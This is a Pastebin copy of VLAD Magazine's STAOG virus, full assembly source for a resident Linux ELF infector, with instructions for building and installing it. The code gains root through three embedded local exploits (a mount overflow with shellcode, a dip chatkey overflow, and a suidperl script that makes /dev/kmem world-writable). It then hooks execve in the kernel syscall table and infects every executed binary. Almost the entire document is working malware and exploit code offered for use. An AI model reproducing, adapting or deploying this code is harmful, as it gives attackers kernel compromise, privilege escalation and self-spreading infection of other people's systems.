API tools faq
paste
Advertisement
FlyFar

VLAD Magazine - Issue #7 - ARTICLE.2_4 - STAOG Linux Virus

FlyFar
Jul 2nd, 2023
1,523
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 18.78 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #  +-----------------------------------------------------------------+
  2. #  |                            S T A O G                            |
  3. #  |                                                                 |
  4. #  |          yo ho.. welcome to yet another attempt at the          |
  5. #  |        impossible and improbable.  This virus is a fully        |
  6. #  |       resident linux elf infector.  It will infect files        |
  7. #  |           on execute regardless of who executed them.           |
  8. #  |         It achieves this by hacking root via 3 separate         |
  9. #  |     exploits and installing itself in the kernel.  It leaves    |
  10. #  |        no trace of itself in drop files or other noticable      |
  11. #  |          locations but contains no stealth of any type.         |
  12. #  |                                                                 |
  13. #  |       This is not a script virus.  It is written in 100%        |
  14. #  |       at&t style asm.  To compile:                              |
  15. #  |                                                                 |
  16. #  |                   gcc vircode.s -o vircode                      |
  17. #  |                   strip vircode                                 |
  18. #  |                                                                 |
  19. #  |   The filesize should be 4744 bytes.  If not put the filesize   |
  20. #  |        in the .long at 'filesize:' and recompile and strip.     |
  21. #  |          Then execute to install.  After installation the       |
  22. #  |         generated binary will automatically be deleted.         |
  23. #  |                                                                 |
  24. #  |   For some reason this virus will only work on ELF machines     |
  25. #  |       running the 1.2.13 kernel.                                |
  26. #  |                                                                 |
  27. #  |                    Q U A N T U M  /  V L A D                    |
  28. #  +-----------------------------------------------------------------+
  29.  
  30. .text
  31. .global vircode
  32. vircode:                                  # start of the virus
  33.     pushl $0                          # entry point
  34.     pushl %ebp                        # setup stack frame
  35.     movl %esp,%ebp
  36.     pusha                             # save all regs
  37.     movl $125,%eax                    # make cs writable
  38.     movl $0x8000000,%ebx
  39.     movl $0x4000,%ecx
  40.     movl $7,%edx
  41.     int $0x80
  42.     call recalc                       # dynamic relocation  
  43. recalc:
  44.     pop %edx
  45.     subl $recalc,%edx
  46.     leal vircode(%edx),%eax           # store entrypoint
  47.     movl %eax,4(%ebp)                
  48.  
  49.     movl $11,%eax                     # are we already resident ?
  50.     movl $0x666,%ebx
  51.     int $0x80
  52.     cmp $0x667,%ebx
  53.     jnz goresident
  54.     jmp ret2host
  55. goresident:
  56.     movl 12(%ebp),%ebx                # open argv[0]
  57.     xorl %ecx,%ecx
  58.     movl $5,%eax
  59.     int $0x80
  60.     or %eax,%eax
  61.     js ohfuck
  62.     movl %eax,%ebx
  63.  
  64.     movl $19,%eax                     # seek to vircode
  65.     movl $vircode-main,%ecx          
  66.     subl filesize(%edx),%ecx
  67.     pushl %edx
  68.     movl $2,%edx
  69.     int $0x80
  70.     popl %edx
  71.  
  72.     subl filesize(%edx),%esp          
  73.  
  74.     movl $3,%eax                      # read in vircode
  75.     movl %esp,%ecx
  76.     pushl %edx
  77.     movl filesize(%edx),%edx                  
  78.     int $0x80
  79.     popl %edx
  80.  
  81.     movl $6,%eax                      # close argv
  82.     int $0x80      
  83.  
  84.     movl $5,%eax                      # open tmp name for virus body
  85.     leal virname(%edx),%ebx
  86.     movl $577,%ecx
  87.     pushl %edx
  88.     movl $448,%edx
  89.     int $0x80
  90.     popl %edx
  91.     movl %eax,%ebx
  92.    
  93.     movl $4,%eax                     # write vircode
  94.     movl %esp,%ecx
  95.     pushl %edx
  96.     movl filesize(%edx),%edx                  
  97.     int $0x80
  98.     popl %edx
  99.  
  100.     movl $6,%eax                     # close tmp
  101.     int $0x80
  102.  
  103.     addl filesize(%edx),%esp                  
  104.  
  105.     movl $2,%eax                         # fork
  106.     int $0x80
  107.     orl %eax,%eax
  108.     jne ret2host
  109.  
  110.     movl $36,%eax                        # sync
  111.     int $0x80
  112.  
  113.     leal virname(%edx),%ebx              # exec the virus
  114.     leal virargs(%edx),%ecx
  115.     movl %ebx,(%ecx)
  116.     movl 8(%ebp),%eax
  117.     shll $2,%eax
  118.     leal 16(%ebp),%edx
  119.     addl %eax,%edx
  120.     movl $11,%eax
  121.     int $0x80
  122.     movl $1,%eax
  123.     int $0x80
  124. # return to host
  125. ret2host:
  126.     movl 12(%ebp),%ebx                # open argv[0]
  127.     xorl %ecx,%ecx
  128.     movl $5,%eax
  129.     int $0x80
  130.     or %eax,%eax
  131.     js ohfuck
  132.     movl %eax,%ebx
  133.     movl %esp,%edi                    # allocate space for return frame
  134.     subl $endstackexecode-stackexecode+50,%edi
  135.     leal stackexecode(%edx),%esi      # copy return frame to stack
  136.     movl $endstackexecode-stackexecode,%ecx
  137.     pushl %edi
  138.     rep
  139.     movsb
  140.     movl $19,%eax                     # move to original bytes in argv[0]
  141.     movl $vircode-main,%ecx
  142.     pushl %edx
  143.     movl $2,%edx
  144.     int $0x80
  145.     popl %edx
  146.     movl $3,%eax                      # ready to read in org bytes
  147.     leal vircode(%edx),%ecx
  148.     movl $main-vircode,%edx
  149.     ret                               # goto return frame
  150.  
  151. ohfuck:
  152.     movl $1,%eax
  153.     int $0x80
  154.  
  155. stackexecode:                             # executed on the stack
  156.     int $0x80                         # retreive original bytes
  157.     movl $6,%eax
  158.     int $0x80                         # close file handle
  159.     popa                              # restore all registers
  160.     pop %ebp                          # restore stack
  161.     ret                               # return to host
  162. endstackexecode:
  163.  
  164. filesize:
  165. .long 4744
  166.  
  167. st:
  168. .long 0
  169.  
  170. virname:
  171. .string "/tmp/hookup"
  172.  
  173. virargs:
  174. .long 0
  175. .long 0
  176.  
  177. .string "Staog by Quantum / VLAD"
  178.  
  179. .global main
  180. main:
  181.     movl %esp,%ebp
  182.     movl $11,%eax                     # are we already resident ?
  183.     movl $0x666,%ebx
  184.     int $0x80
  185.     cmp $0x667,%ebx
  186.     jnz goresident1
  187.     jmp tmpend
  188. goresident1:
  189.     movl $125,%eax                    # make cs writable
  190.     movl $0x8000000,%ebx
  191.     movl $0x4000,%ecx
  192.     movl $7,%edx
  193.     int $0x80
  194.     movl $130,%eax                    # get num kernel syms
  195.     movl $0,%ebx
  196.     int $0x80
  197.     shll $6,%eax
  198.     subl %eax,%esp
  199.     movl %esp,%esi
  200.     pushl %eax
  201.     movl %esi,%ebx                    # get kernel syms
  202.     movl $130,%eax
  203.     int $0x80
  204.     pushl %esi      
  205. nextsym1:                                  # find symbol
  206.     movl $thissym1,%edi
  207.     push %esi
  208.     addl $4,%esi
  209.     cmpb $95,(%esi)
  210.     jnz notuscore
  211.     incl %esi
  212. notuscore:
  213.     cmpsl
  214.     cmpsl
  215.     pop %esi
  216.     jz foundsym1
  217.     addl $64,%esi
  218.     jmp nextsym1
  219. foundsym1:
  220.     movl (%esi),%esi
  221.     movl %esi,current
  222.     popl %esi
  223.  
  224.     pushl %esi      
  225. nextsym2:                                  # find symbol
  226.     movl $thissym2,%edi
  227.     push %esi
  228.     addl $4,%esi
  229.     cmpsl
  230.     cmpsl
  231.     pop %esi
  232.     jz foundsym2
  233.     addl $64,%esi
  234.     jmp nextsym2
  235. foundsym2:
  236.     movl (%esi),%esi
  237.     movl %esi,kmalloc
  238.     popl %esi
  239.  
  240.     xorl %ecx,%ecx
  241. nextsym:                                  # find symbol
  242.     movl $thissym,%edi
  243.     movb $15,%cl
  244.     push %esi
  245.     addl $4,%esi
  246.     rep
  247.     cmpsb
  248.     pop %esi
  249.     jz foundsym
  250.     addl $64,%esi
  251.     jmp nextsym
  252. foundsym:
  253.     movl (%esi),%esi
  254.     pop %eax
  255.     addl %eax,%esp
  256.  
  257.     movl %esi,syscalltable
  258.     xorl %edi,%edi
  259.    
  260. opendevkmem:
  261.     movl $devkmem,%ebx           # open /dev/kmem
  262.     movl $2,%ecx
  263.     call openfile
  264.     orl %eax,%eax
  265.     js haxorroot
  266.     movl %eax,%ebx
  267.  
  268.     leal 44(%esi),%ecx                # lseek to sys_call_table[SYS_execve]
  269.     call seekfilestart
  270.    
  271.     movl $orgexecve,%ecx         # read in execve pointer
  272.     movl $4,%edx
  273.     call readfile
  274.  
  275.     leal 488(%esi),%ecx               # seek to sys_call_table[SYS_uname]
  276.     call seekfilestart
  277.  
  278.     movl $taskptr,%ecx           # read in sys_call_table[SYS_uname]
  279.     movl $4,%edx
  280.     call readfile
  281.    
  282.     movl taskptr,%ecx           # seek to uname code
  283.     call seekfilestart
  284.  
  285.     subl $endhookspace-hookspace,%esp
  286.    
  287.     movl %esp,%ecx                    # read in org uname bytes
  288.     movl $endhookspace-hookspace,%edx
  289.     call readfile
  290.    
  291.     movl taskptr,%ecx           # seek to uname code
  292.     call seekfilestart
  293.  
  294.     movl filesize,%eax                # amount to alloc
  295.     addl $virend-vircode,%eax
  296.     movl %eax,virendvircodefilesize
  297.  
  298.     movl $hookspace,%ecx         # write our code
  299.     movl $endhookspace-hookspace,%edx
  300.     call writefile
  301.  
  302.     movl $122,%eax                    # call uname to alloc some space
  303.     int $0x80
  304.     movl %eax,codeto
  305.    
  306.     movl taskptr,%ecx                 # seek to uname code
  307.     call seekfilestart
  308.  
  309.     movl %esp,%ecx                    # write org uname bytes
  310.     movl $endhookspace-hookspace,%edx
  311.     call writefile
  312.    
  313.     addl $endhookspace-hookspace,%esp
  314.  
  315.     subl $aftreturn-vircode,orgexecve      
  316.  
  317.     movl codeto,%ecx                  # seek to buffer
  318.     subl %ecx,orgexecve
  319.     call seekfilestart
  320.  
  321.     movl $vircode,%ecx                # write vircode
  322.     movl $virend-vircode,%edx
  323.     call writefile
  324.  
  325.     subl filesize,%esp                # read in virus      
  326.     pushl %ebx
  327.     movl 8(%ebp),%ebx
  328.     movl (%ebx),%ebx
  329.     xorl %ecx,%ecx
  330.     call openfile
  331.     movl %eax,%ebx
  332.     leal 4(%esp),%ecx
  333.     movl filesize,%edx                      
  334.     call readfile
  335.     call closefile
  336.     popl %ebx
  337.  
  338.     movl %esp,%ecx                    # write virus to end of alloc space
  339.     movl filesize,%edx                      
  340.     call writefile
  341.  
  342.     addl filesize,%esp                      
  343.  
  344.     leal 44(%esi),%ecx                # seek to sys_call_table[SYS_execve]
  345.     call seekfilestart
  346.  
  347.     addl $newexecve-vircode,codeto
  348.  
  349.     movl $codeto,%ecx                 # write pointer to execve handler
  350.     movl $4,%edx
  351.     call writefile
  352.  
  353.     call closefile                    # close file
  354.  
  355. tmpend:
  356.     movl 8(%ebp),%ebx                 # rm argv[0]
  357.     movl (%ebx),%ebx
  358.     call rmfile
  359.     call exit
  360.  
  361. openfile:
  362.     movl $5,%eax
  363.     int $0x80
  364.     ret
  365.  
  366. closefile:
  367.     movl $6,%eax
  368.     int $0x80
  369.     ret
  370.  
  371. readfile:
  372.     movl $3,%eax
  373.     int $0x80
  374.     ret
  375.  
  376. writefile:
  377.     movl $4,%eax
  378.     int $0x80
  379.     ret
  380.  
  381. seekfilestart:
  382.     movl $19,%eax
  383.     xorl %edx,%edx
  384.     int $0x80
  385.     ret
  386.  
  387. rmfile:
  388.     movl $10,%eax
  389.     int $0x80
  390.     ret
  391.  
  392.  
  393. exit:
  394.     xorl %eax,%eax
  395.     incl %eax
  396.     int $0x80
  397.  
  398. waitchild:
  399.     movl $7,%eax
  400.     movl $-1,%ebx
  401.     movl $st,%ecx
  402.     xorl %edx,%edx
  403.     int $0x80
  404.     ret
  405.  
  406.  
  407.  
  408. haxorroot:                                # this routine makes /dev/kmem a+wr
  409.     cmpl $3,%edi
  410.     jz ret2host
  411.     movl $2,%eax                      # fork()
  412.     int $0x80
  413.     orl %eax,%eax                     # are we the child or parent
  414.     jnz parent
  415.     xorl %ebx,%ebx                    # close stdin
  416.     call closefile  
  417.     movl $1,%ebx                      # close stdout
  418.     call closefile  
  419.     movl $2,%ebx                      # close stderr
  420.     call closefile
  421.     cmpl $1,%edi                      # try sploit 1
  422.     jz sploit1
  423.     cmpl $2,%edi                      # try sploit 2
  424.     jz sploit2
  425.     movl $2,%eax                      # try sploit 3
  426.     int $0x80                         # fork
  427.     orl %eax,%eax  
  428.     jne notc1
  429.     movl $2,%eax                      # fork
  430.     int $0x80
  431.     orl %eax,%eax
  432.     jne notc2
  433.     movl $4,r
  434.     jmp allgo
  435. notc2:
  436.     call waitchild                    # wait for child
  437.     movl $8,r
  438.     jmp allgo
  439. notc1:
  440.     call waitchild                    # wait for child
  441.     movl $0,r
  442. allgo:
  443.     subl $1029,%esp                   # allocate space for egg
  444.     mov %esp,%edi
  445.     movl $1028-60,%ecx
  446.     subl r,%ecx
  447.     movb $0x90,%al                    # add nops to egg
  448.     rep
  449.     stosb
  450.     movl $execshell,%esi              # add shell to egg
  451.     movl $60,%ecx
  452.     rep
  453.     movsb
  454.     movl %esp,%eax                    # add return address
  455.     addl $1200,%eax
  456.     stosl
  457.     xorl %eax,%eax
  458.     stosb
  459.     movl $11,%eax                     # execute mount sploit
  460.     movl $mountpath,%ebx
  461.     movl $args,%ecx
  462.     movl %esp,4(%ecx)
  463.     movl $env,%edx
  464.     int $0x80
  465.     call exit
  466.  
  467. execshell:
  468. .string "\xeb\x21\x5b\x31\xc9\x66\xb9\xff\x01\x31\xc0\x88\x43\x09\x88\x43\x14\xb0\x0f\xcd\x80\x31\xc0\xb0\x0a\x8d\x5b\x0a\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xda\xff\xff\xff/dev/kmemx/etc/mtab~"
  469. mountpath:
  470. .string "/sbin/mount"
  471. r:
  472. .long 0
  473. args:
  474. .long mountpath
  475. .long 0
  476. .long 0
  477. env:
  478. .long 0
  479.  
  480. dipname:
  481. .string "/tmp/t.dip"
  482. execthis:
  483. .string "/bin/sh"
  484. parm1:
  485. .string "-c"
  486. pathdip:
  487. .string "/sbin/dip /tmp/t.dip"
  488. args1:
  489. .long execthis
  490. .long parm1
  491. .long pathdip
  492. .long 0
  493. chkey:
  494. .string "chatkey "
  495. hsname:
  496. .string "/tmp/hs"
  497. hsdat:
  498. .string "#!/bin/sh\nchmod 666 /dev/kmem\n"
  499. shell:
  500. .string "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs"
  501. sploit1:
  502.     subl $1024,%esp                  # allocate space for egg
  503.     movl %esp,%edi
  504.     movl $chkey,%esi                 # add "chatkey " to egg
  505.     movsl
  506.     movsl
  507.     movl %esp,%eax
  508.     subl $224,%eax                   # add return address to egg
  509.     movl $34,%ecx
  510.     rep
  511.     stosl
  512.     movl $512-144,%ecx               # add nops to egg
  513.     movb $0x90,%al
  514.     rep
  515.     stosb
  516.     movl $shell,%esi                 # add shell to egg
  517.     movl $50,%ecx
  518.     rep
  519.     movsb
  520.     movl $10,%al                     # add \n to egg
  521.     stosb
  522.     movl $dipname,%ebx               # create dip script
  523.     movl $577,%ecx
  524.     movl $448,%edx
  525.     call openfile
  526.     movl %eax,%ebx
  527.     movl %esp,%ecx
  528.     pushl %edx
  529.     movl $562,%edx                   # write script code
  530.     call writefile
  531.     popl %edx
  532.     call closefile        
  533.     movl $hsname,%ebx                # create shell file to execute
  534.     movl $577,%ecx
  535.     movl $448,%edx
  536.     call openfile
  537.     movl %eax,%ebx
  538.     movl $hsdat,%ecx
  539.     movl $30,%edx
  540.     call writefile                   # write shell contents
  541.     call closefile        
  542.     movl $2,%eax                     # fork
  543.     int $0x80
  544.     orl %eax,%eax
  545.     jne p1
  546.     movl $execthis,%ebx              # execute sploit
  547.     movl $args1,%ecx
  548.     movl 12(%ebp),%edx
  549.     movl $11,%eax
  550.     int $0x80
  551.     call exit        
  552. p1:     call waitchild                   # wait for sploit to finish
  553.     movl $dipname,%ebx               # remove dip script
  554.     call rmfile
  555.     movl $hsname,%ebx                # remove shell script
  556.     call rmfile
  557.     call exit
  558.  
  559. perlname:
  560. .string "/tmp/b"
  561.  
  562. perldat:
  563. .string "#!/usr/bin/suidperl -U\n$ENV{PATH}=\"/bin:/usr/bin\";\n$>=0;$<=0;\nexec(\"chmod 666 /dev/kmem\");\n"
  564.  
  565. perlargs:
  566. .long perlname
  567. perlenv:
  568. .long 0
  569.  
  570. sploit2:
  571.     movl $perlname,%ebx                  # create perl script
  572.     movl $577,%ecx
  573.     movl $488,%edx
  574.     call openfile
  575.     movl %eax,%ebx
  576.     movl $perldat,%ecx                   # write perl contents
  577.     movl $91,%edx
  578.     call writefile
  579.     movl $94,%eax
  580.     movl $2496,%ecx
  581.     int $0x80
  582.     call closefile        
  583.     movl $2,%eax                         # fork
  584.     int $0x80
  585.     orl %eax,%eax
  586.     jne p2
  587.     movl $11,%eax                        # execute the sploit
  588.     movl $perlname,%ebx
  589.     movl $perlargs,%ecx
  590.     movl $perlenv,%edx
  591.     int $0x80
  592.     call exit      
  593. p2:
  594.     call waitchild                       # wait for the child
  595.     movl $perlname,%ebx                  # remove perl script
  596.     call rmfile
  597.     call exit      
  598.  
  599. parent:
  600.     incl %edi
  601.     call waitchild  # wait for child process to finish
  602.     jmp opendevkmem
  603.  
  604. taskptr:
  605. .long 0
  606.  
  607. otaskptr:
  608. .long 0
  609.  
  610. codeto:
  611. .long 0
  612.  
  613. thissym:
  614. .string "sys_call_table"
  615.  
  616. thissym1:
  617. .string "current"
  618.  
  619. thissym2:
  620. .string "kmalloc"
  621.  
  622. devkmem:
  623. .string "/dev/kmem"
  624.  
  625. e_entry:
  626. .long 0x666
  627.  
  628. infect:                                   # opens and infects the file in %ebx
  629.     pushl $2                          # open %ebx
  630.     pushl %ebx
  631.     call 5*4(%ebp)
  632.     popl %ebx
  633.     popl %ebx
  634.     orl %eax,%eax                     # make sure it's opened
  635.     js e1
  636.     movl %eax,%ebx
  637.     push %fs
  638.     push %ds
  639.     pop %fs
  640.     leal e_entry(%edi),%ecx                 # read in elf hdr marker
  641.     movl $4,%edx
  642.     pushl %edx
  643.     pushl %ecx
  644.     pushl %ebx
  645.     call 3*4(%ebp)  
  646.     addl $12,%esp
  647.     cmpl $0x464c457f,e_entry(%edi)          # make sure it's elf
  648.     jnz e2
  649.     pushl $0                                # seek to entrypoint storage
  650.     pushl $24
  651.     pushl %ebx
  652.     call 19*4(%ebp)
  653.     addl $12,%esp
  654.     leal e_entry(%edi),%ecx                 # read the entrypoint
  655.     pushl $4
  656.     pushl %ecx
  657.     pushl %ebx
  658.     call 3*4(%ebp)
  659.     addl $12,%esp
  660.     andl $0xffff,e_entry(%edi)
  661.     movl e_entry(%edi),%ecx               # seek to entrypoint
  662.     pushl $0
  663.     pushl %ecx
  664.     pushl %ebx
  665.     call 19*4(%ebp)
  666.     popl %eax
  667.     popl %eax
  668.     popl %eax
  669.     subl $main-vircode,%esp               # allocate space on the stack
  670.     movl %esp,%esi
  671.     pushl $main-vircode                     # read in host bytes
  672.     pushl %esi
  673.     pushl %ebx
  674.     call 3*4(%ebp)
  675.     addl $12,%esp
  676.     movl vircode(%edi),%eax
  677.     cmpl %eax,(%esi)                        # check if file infected
  678.     jz e3
  679.  
  680.     pushl $2                                # seek to end of file
  681.     pushl $0
  682.     pushl %ebx
  683.     call 19*4(%ebp)
  684.     addl $12,%esp
  685.     movl filesize(%edi),%eax
  686.     pushl %eax                              
  687.     leal virend(%edi),%eax                  # write virus body to end
  688.     pushl %eax
  689.     pushl %ebx
  690.     call 4*4(%ebp)
  691.     addl $12,%esp
  692.     pushl $2                                # seek to end of file
  693.     pushl $0
  694.     pushl %ebx
  695.     call 19*4(%ebp)
  696.     addl $12,%esp
  697.     pushl $main-vircode                   # write org bytes
  698.     pushl %esi
  699.     pushl %ebx
  700.     call 4*4(%ebp)  
  701.     addl $12,%esp
  702.     movl e_entry(%edi),%ecx                 # seek to entrypoint
  703.     pushl $0
  704.     pushl %ecx
  705.     pushl %ebx
  706.     call 19*4(%ebp)
  707.     addl $12,%esp
  708.     leal vircode(%edi),%ecx                 # write virus
  709.     pushl $main-vircode
  710.     pushl %ecx
  711.     pushl %ebx
  712.     call 4*4(%ebp)
  713.     addl $12,%esp
  714. e3:
  715.     addl $main-vircode,%esp               # deallocate space off stack
  716. e2:
  717.     pop %fs
  718.     pushl %ebx
  719.     call 6*4(%ebp)                          # close file
  720.     popl %eax
  721.     call 36*4(%ebp)                         # sync
  722. e1:
  723.     ret
  724.  
  725. uidsave:
  726. .word 0
  727. euidsave:
  728. .word 0
  729. suidsave:
  730. .word 0
  731. fsuidsave:
  732. .word 0
  733.  
  734. gidsave:
  735. .word 0
  736. egidsave:
  737. .word 0
  738. sgidsave:
  739. .word 0
  740. fsgidsave:
  741. .word 0
  742.  
  743. saveuids:
  744.     movl current(%edi),%eax
  745.     movl (%eax),%eax
  746.     leal 0x310(%eax),%esi
  747.     pushl %edi
  748.     leal uidsave(%edi),%edi
  749.     movl $4,%ecx
  750.     rep
  751.     movsl
  752.     popl %edi
  753.     ret
  754.  
  755. makeroot:
  756.     movl current(%edi),%eax
  757.     movl (%eax),%eax
  758.     pushl %edi
  759.     leal 0x310(%eax),%edi
  760.     xorl %eax,%eax
  761.     movl $4,%ecx
  762.     rep
  763.     stosl
  764.     popl %edi
  765.     ret
  766.  
  767. loaduids:
  768.     movl current(%edi),%eax
  769.     movl (%eax),%eax
  770.     leal uidsave(%edi),%esi
  771.     pushl %edi
  772.     leal 0x310(%eax),%edi
  773.     movl $4,%ecx
  774.     rep
  775.     movsl
  776.     popl %edi
  777.     ret
  778.  
  779. .global newexecve
  780. newexecve:
  781.     pushl %ebp
  782.     movl %esp,%ebp
  783.     pushl %ebx
  784.     movl 8(%ebp),%ebx                   # get the filename to infect
  785.     pushal
  786.     cmpl $0x666,%ebx                    # is this our service routine ?
  787.     jnz notserv
  788.     popal
  789.     incl 8(%ebp)                        # yes..inc the pointer and return
  790.     popl %ebx
  791.     popl %ebp
  792.     ret
  793. notserv:
  794.     call ring0recalc                    # no.. calculate ring 0 delta
  795. ring0recalc:
  796.     popl %edi
  797.     subl $ring0recalc,%edi
  798.     movl syscalltable(%edi),%ebp        # put *sys_call_table in %ebp
  799.     call saveuids                       # save the callers uid/euid...
  800.     call makeroot                       # make the caller root
  801.     call infect                         # infect the file
  802.     call loaduids                       # restore the callers uid/euid...
  803. hookoff:
  804.     popal
  805.     popl %ebx
  806.     popl %ebp
  807. .byte   0xe9                                # goto original execve
  808. orgexecve:
  809. .long   0
  810. aftreturn:
  811.  
  812. syscalltable:
  813. .long 0
  814.  
  815. current:
  816. .long 0
  817.  
  818. .global hookspace
  819. hookspace:
  820.     push %ebp
  821.     pushl %ebx
  822.     pushl %ecx
  823.     pushl %edx
  824.     movl %esp,%ebp
  825.  
  826.     pushl $3
  827. .byte   0x68
  828. virendvircodefilesize:
  829. .long   0
  830. .byte   0xb8               # movl $xxx,%eax    
  831. kmalloc:
  832. .long   0
  833.     call %eax
  834.  
  835.     movl %ebp,%esp
  836.     popl %edx
  837.     popl %ecx
  838.     popl %ebx
  839.     popl %ebp      
  840.     ret    
  841.  
  842. .global endhookspace
  843. endhookspace:
  844. .global virend
  845. virend:
  846.  
Tags: Linux virus vlad
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!